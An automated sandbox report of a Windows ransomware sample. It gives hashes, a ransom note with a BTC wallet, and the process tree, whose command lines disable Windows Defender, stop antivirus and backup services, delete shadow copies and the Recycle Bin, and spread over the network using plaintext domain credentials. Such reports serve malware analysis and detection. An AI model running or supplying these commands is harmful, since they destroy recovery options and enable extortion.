Analysis
  max time kernel: 81s
  max time network: 142s
  platform: windows10_x64
  resource: win10v200430
  submitted: 10-07-2020 06:52
Static task: static1
Behavioral task: behavioral1
  Sample: safeboot network ransomware.exe
  Resource: win7
Behavioral task: behavioral2
  Sample: safeboot network ransomware.exe
  Resource: win10v200430
General
  Target: safeboot network ransomware.exe
  Size: 82KB
  MD5: e01e11dca5e8b08fc8231b1cb6e2048c
  SHA1: 4983d07f004436caa3f10b38adacbba6a4ede01a
  SHA256: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
  SHA512: 298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
Malware Config
Signatures

Suspicious use of FindShellTrayWindow (3 IoCs)
Processes:
  pid   process
  2536  safeboot network ransomware.exe
  2536  safeboot network ransomware.exe
  2536  safeboot network ransomware.exe
Drops startup file (1 IoCs)
Processes:
  description   ioc                                                                                        process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk  safeboot network ransomware.exe
Executes dropped EXE (1 IoCs)
Processes:
  pid   process
  3796  gvx4wrbz.exe
Blacklisted process makes network request (3 IoCs)
Processes:
  flow  pid   process
  19    4868  mshta.exe
  21    4868  mshta.exe
  23    4868  mshta.exe
Modifies WinLogon (2 TTPs, 2 IoCs)
Processes:
  description      ioc                                                                                             process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."  safeboot network ransomware.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"  safeboot network ransomware.exe
Suspicious behavior: EnumeratesProcesses (3067 IoCs)
Processes:
  pid   process
  2536  safeboot network ransomware.exe
Suspicious use of WriteProcessMemory (233 IoCs)
Processes:
  description                        pid   process                          target process
  PID 2536 wrote to memory of 652    2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 652    2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1732   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1732   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1668   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1668   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2088   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2088   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2652   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2652   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 3060   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 3060   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2004   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2004   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 3096   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 3096   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2200   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 2200   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1236   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1236   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1748   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 1748   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 4180   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 4180   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 4304   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 4304   2536  safeboot network ransomware.exe  powershell.exe
  PID 2536 wrote to memory of 4356   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4356   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4368   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4368   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4396   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4396   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4428   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4428   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4468   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4468   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4528   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4528   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4568   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4568   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4612   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4612   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4656   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4656   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4688   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4688   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4724   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4724   2536  safeboot network ransomware.exe  net.exe
  PID 4356 wrote to memory of 4752   4356  net.exe                          net1.exe
  PID 4356 wrote to memory of 4752   4356  net.exe                          net1.exe
  PID 4368 wrote to memory of 4780   4368  net.exe                          net1.exe
  PID 4368 wrote to memory of 4780   4368  net.exe                          net1.exe
  PID 2536 wrote to memory of 4796   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4796   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4828   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4828   2536  safeboot network ransomware.exe  net.exe
  PID 4396 wrote to memory of 4868   4396  net.exe                          net1.exe
  PID 4396 wrote to memory of 4868   4396  net.exe                          net1.exe
  PID 2536 wrote to memory of 4896   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4896   2536  safeboot network ransomware.exe  net.exe
  PID 4428 wrote to memory of 4924   4428  net.exe                          net1.exe
  PID 4428 wrote to memory of 4924   4428  net.exe                          net1.exe
  PID 2536 wrote to memory of 4948   2536  safeboot network ransomware.exe  net.exe
  PID 2536 wrote to memory of 4948   2536  safeboot network ransomware.exe  net.exe
Interacts with shadow copies (2 TTPs, 14 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid   process
  5376  vssadmin.exe
  4792  vssadmin.exe
  4808  vssadmin.exe
  4836  vssadmin.exe
  4848  vssadmin.exe
  4856  vssadmin.exe
  4576  vssadmin.exe
  4932  vssadmin.exe
  4896  vssadmin.exe
  4452  vssadmin.exe
  6040  vssadmin.exe
  4324  vssadmin.exe
  4640  vssadmin.exe
  4628  vssadmin.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies service (2 TTPs, 5 IoCs)
Processes:
  description  ioc                                                                                                         process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                    vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                                  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                         vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                    vssvc.exe
Modifies Windows Defender Real-time Protection settings (3 IoCs)
Processes:
  description      ioc                                                                                                                process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"     safeboot network ransomware.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"     safeboot network ransomware.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"   safeboot network ransomware.exe
Suspicious use of AdjustPrivilegeToken (296 IoCs)
Processes:
  description                           pid   process
  Token: SeDebugPrivilege               2536  safeboot network ransomware.exe
  Token: SeDebugPrivilege               652   powershell.exe
  Token: SeIncreaseQuotaPrivilege       652   powershell.exe
  Token: SeSecurityPrivilege            652   powershell.exe
  Token: SeTakeOwnershipPrivilege       652   powershell.exe
  Token: SeLoadDriverPrivilege          652   powershell.exe
  Token: SeSystemProfilePrivilege       652   powershell.exe
  Token: SeSystemtimePrivilege          652   powershell.exe
  Token: SeProfSingleProcessPrivilege   652   powershell.exe
  Token: SeIncBasePriorityPrivilege     652   powershell.exe
  Token: SeCreatePagefilePrivilege      652   powershell.exe
  Token: SeBackupPrivilege              652   powershell.exe
  Token: SeRestorePrivilege             652   powershell.exe
  Token: SeShutdownPrivilege            652   powershell.exe
  Token: SeDebugPrivilege               652   powershell.exe
  Token: SeSystemEnvironmentPrivilege   652   powershell.exe
  Token: SeRemoteShutdownPrivilege      652   powershell.exe
  Token: SeUndockPrivilege              652   powershell.exe
  Token: SeManageVolumePrivilege        652   powershell.exe
  Token: 33                             652   powershell.exe
  Token: 34                             652   powershell.exe
  Token: 35                             652   powershell.exe
  Token: 36                             652   powershell.exe
  Token: SeDebugPrivilege               1732  powershell.exe
  Token: SeDebugPrivilege               1668  powershell.exe
  Token: SeDebugPrivilege               2088  powershell.exe
  Token: SeDebugPrivilege               2652  powershell.exe
  Token: SeDebugPrivilege               3060  powershell.exe
  Token: SeDebugPrivilege               2004  powershell.exe
  Token: SeDebugPrivilege               3096  powershell.exe
  Token: SeIncreaseQuotaPrivilege       1732  powershell.exe
  Token: SeSecurityPrivilege            1732  powershell.exe
  Token: SeTakeOwnershipPrivilege       1732  powershell.exe
  Token: SeLoadDriverPrivilege          1732  powershell.exe
  Token: SeSystemProfilePrivilege       1732  powershell.exe
  Token: SeSystemtimePrivilege          1732  powershell.exe
  Token: SeProfSingleProcessPrivilege   1732  powershell.exe
  Token: SeIncBasePriorityPrivilege     1732  powershell.exe
  Token: SeCreatePagefilePrivilege      1732  powershell.exe
  Token: SeBackupPrivilege              1732  powershell.exe
  Token: SeRestorePrivilege             1732  powershell.exe
  Token: SeShutdownPrivilege            1732  powershell.exe
  Token: SeDebugPrivilege               1732  powershell.exe
  Token: SeSystemEnvironmentPrivilege   1732  powershell.exe
  Token: SeRemoteShutdownPrivilege      1732  powershell.exe
  Token: SeUndockPrivilege              1732  powershell.exe
  Token: SeManageVolumePrivilege        1732  powershell.exe
  Token: 33                             1732  powershell.exe
  Token: 34                             1732  powershell.exe
  Token: 35                             1732  powershell.exe
  Token: 36                             1732  powershell.exe
  Token: SeIncreaseQuotaPrivilege       2088  powershell.exe
  Token: SeSecurityPrivilege            2088  powershell.exe
  Token: SeTakeOwnershipPrivilege       2088  powershell.exe
  Token: SeLoadDriverPrivilege          2088  powershell.exe
  Token: SeSystemProfilePrivilege       2088  powershell.exe
  Token: SeSystemtimePrivilege          2088  powershell.exe
  Token: SeProfSingleProcessPrivilege   2088  powershell.exe
  Token: SeIncBasePriorityPrivilege     2088  powershell.exe
  Token: SeCreatePagefilePrivilege      2088  powershell.exe
  Token: SeBackupPrivilege              2088  powershell.exe
  Token: SeRestorePrivilege             2088  powershell.exe
  Token: SeShutdownPrivilege            2088  powershell.exe
  Token: SeDebugPrivilege               2088  powershell.exe
Suspicious use of SendNotifyMessage (3 IoCs)
Processes:
  pid   process
  2536  safeboot network ransomware.exe
  2536  safeboot network ransomware.exe
  2536  safeboot network ransomware.exe
Kills process with taskkill (3 IoCs)
Processes:
  pid   process
  3872  taskkill.exe
  4240  taskkill.exe
  5260  taskkill.exe
Runs ping.exe (1 TTP, 1 IoC)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Runs net.exe

Processes
1⤵ C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe"
   - Suspicious use of FindShellTrayWindow
   - Drops startup file
   - Modifies WinLogon
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
   - Modifies Windows Defender Real-time Protection settings
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of SendNotifyMessage
   PID: 2536

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell" Get-MpPreference -verbose
      - Suspicious use of AdjustPrivilegeToken
      PID: 652

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      - Suspicious use of AdjustPrivilegeToken
      PID: 1732

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      - Suspicious use of AdjustPrivilegeToken
      PID: 1668

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      - Suspicious use of AdjustPrivilegeToken
      PID: 2088

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      - Suspicious use of AdjustPrivilegeToken
      PID: 2652

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      - Suspicious use of AdjustPrivilegeToken
      PID: 3060

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      - Suspicious use of AdjustPrivilegeToken
      PID: 2004

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      - Suspicious use of AdjustPrivilegeToken
      PID: 3096

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      PID: 2200

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      PID: 1236

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      PID: 1748

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      PID: 4180

   2⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      PID: 4304

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop avpsus /y
      - Suspicious use of WriteProcessMemory
      PID: 4356

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop avpsus /y
         PID: 4752

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop McAfeeDLPAgentService /y
      - Suspicious use of WriteProcessMemory
      PID: 4368

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
         PID: 4780

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop mfewc /y
      - Suspicious use of WriteProcessMemory
      PID: 4396

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop mfewc /y
         PID: 4868

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BMR Boot Service /y
      - Suspicious use of WriteProcessMemory
      PID: 4428

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BMR Boot Service /y
         PID: 4924

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop NetBackup BMR MTFTP Service /y
      PID: 4468

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
         PID: 5000

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop DefWatch /y
      PID: 4528

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop DefWatch /y
         PID: 5008

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop ccEvtMgr /y
      PID: 4568

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop ccEvtMgr /y
         PID: 5060

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop ccSetMgr /y
      PID: 4612

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop ccSetMgr /y
         PID: 4200

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop SavRoam /y
      PID: 4656

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop SavRoam /y
         PID: 4364

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop RTVscan /y
      PID: 4688

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop RTVscan /y
         PID: 4564

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop QBFCService /y
      PID: 4724

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop QBFCService /y
         PID: 2180

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop QBIDPService /y
      PID: 4796

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop QBIDPService /y
         PID: 4996

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop Intuit.QuickBooks.FCS /y
      PID: 4828

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
         PID: 5132

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop QBCFMonitorService /y
      PID: 4896

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop QBCFMonitorService /y
         PID: 5284

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop YooBackup /y
      PID: 4948

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop YooBackup /y
         PID: 5324

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop YooIT /y
      PID: 5028

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop YooIT /y
         PID: 5404

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop zhudongfangyu /y
      PID: 5108

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop zhudongfangyu /y
         PID: 5448

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop stc_raw_agent /y
      PID: 2988

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop stc_raw_agent /y
         PID: 5508

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop VSNAPVSS /y
      PID: 3636

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop VSNAPVSS /y
         PID: 5576

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop VeeamTransportSvc /y
      PID: 4760

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop VeeamTransportSvc /y
         PID: 5608

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop VeeamDeploymentService /y
      PID: 5016

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop VeeamDeploymentService /y
         PID: 5708

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop VeeamNFSSvc /y
      PID: 4824

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop VeeamNFSSvc /y
         PID: 5720

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop veeam /y
      PID: 5176

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop veeam /y
         PID: 5876

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop PDVFSService /y
      PID: 5248

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop PDVFSService /y
         PID: 5940

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecVSSProvider /y
      PID: 5336

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecVSSProvider /y
         PID: 5980

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecAgentAccelerator /y
      PID: 5384

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
         PID: 6068

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecAgentBrowser /y
      PID: 5468

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
         PID: 6116

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecDiveciMediaService /y
      PID: 5520

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
         PID: 1128

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecJobEngine /y
      PID: 5560

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecJobEngine /y
         PID: 4472

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecManagementService /y
      PID: 5640

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecManagementService /y
         PID: 4584

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop BackupExecRPCService /y
      PID: 5684

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop BackupExecRPCService /y
         PID: 5748

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop AcrSch2Svc /y
      PID: 5764

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop AcrSch2Svc /y
         PID: 4924

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop AcronisAgent /y
      PID: 5828

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop AcronisAgent /y
         PID: 4556

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop CASAD2DWebSvc /y
      PID: 5900

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop CASAD2DWebSvc /y
         PID: 4812

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop CAARCUpdateSvc /y
      PID: 5968

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop CAARCUpdateSvc /y
         PID: 5124

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" stop sophos /y
      PID: 6028

      3⤵ C:\Windows\system32\net1.exe
         Command line: C:\Windows\system32\net1 stop sophos /y
         PID: 5816

   2⤵ C:\Windows\SYSTEM32\sc.exe
      Command line: "sc.exe" config SQLTELEMETRY start= disabled
      PID: 6084

   2⤵ C:\Windows\SYSTEM32\sc.exe
      Command line: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID: 5184

   2⤵ C:\Windows\SYSTEM32\sc.exe
      Command line: "sc.exe" config SQLWriter start= disabled
      PID: 5864

   2⤵ C:\Windows\SYSTEM32\sc.exe
      Command line: "sc.exe" config SstpSvc start= disabled
      PID: 4436

   2⤵ C:\Windows\SYSTEM32\taskkill.exe
      Command line: "taskkill.exe" /IM mspub.exe /F
      - Kills process with taskkill
      PID: 3872

   2⤵ C:\Windows\SYSTEM32\taskkill.exe
      Command line: "taskkill.exe" /IM mydesktopqos.exe /F
      - Kills process with taskkill
      PID: 4240

   2⤵ C:\Windows\SYSTEM32\taskkill.exe
      Command line: "taskkill.exe" /IM mydesktopservice.exe /F
      - Kills process with taskkill
      PID: 5260

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
      PID: 4324

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
      PID: 4848

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 4640

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Interacts with shadow copies
      PID: 4896

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 4452

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Interacts with shadow copies
      PID: 4628

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 6040

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
      - Interacts with shadow copies
      PID: 4792

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 4808

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
      - Interacts with shadow copies
      PID: 4856

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 4836

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
      - Interacts with shadow copies
      PID: 5376

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      - Interacts with shadow copies
      PID: 4576

   2⤵ C:\Windows\SYSTEM32\vssadmin.exe
      Command line: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
      PID: 4932

   2⤵ C:\Windows\SYSTEM32\cmd.exe
      Command line: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      PID: 5164

   2⤵ C:\Windows\SYSTEM32\net.exe
      Command line: "net.exe" use \\10.10.0.26 /USER:SHJPOLICE\amer !Omar2012
      PID: 5584

   2⤵ C:\Users\Admin\AppData\Local\Temp\gvx4wrbz.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\gvx4wrbz.exe" \10.10.0.26 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe
      - Executes dropped EXE
      PID: 3796

   2⤵ C:\Windows\SYSTEM32\arp.exe
      Command line: "arp" -a
      PID: 2776

   2⤵ C:\Windows\System32\mshta.exe
      Command line: "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
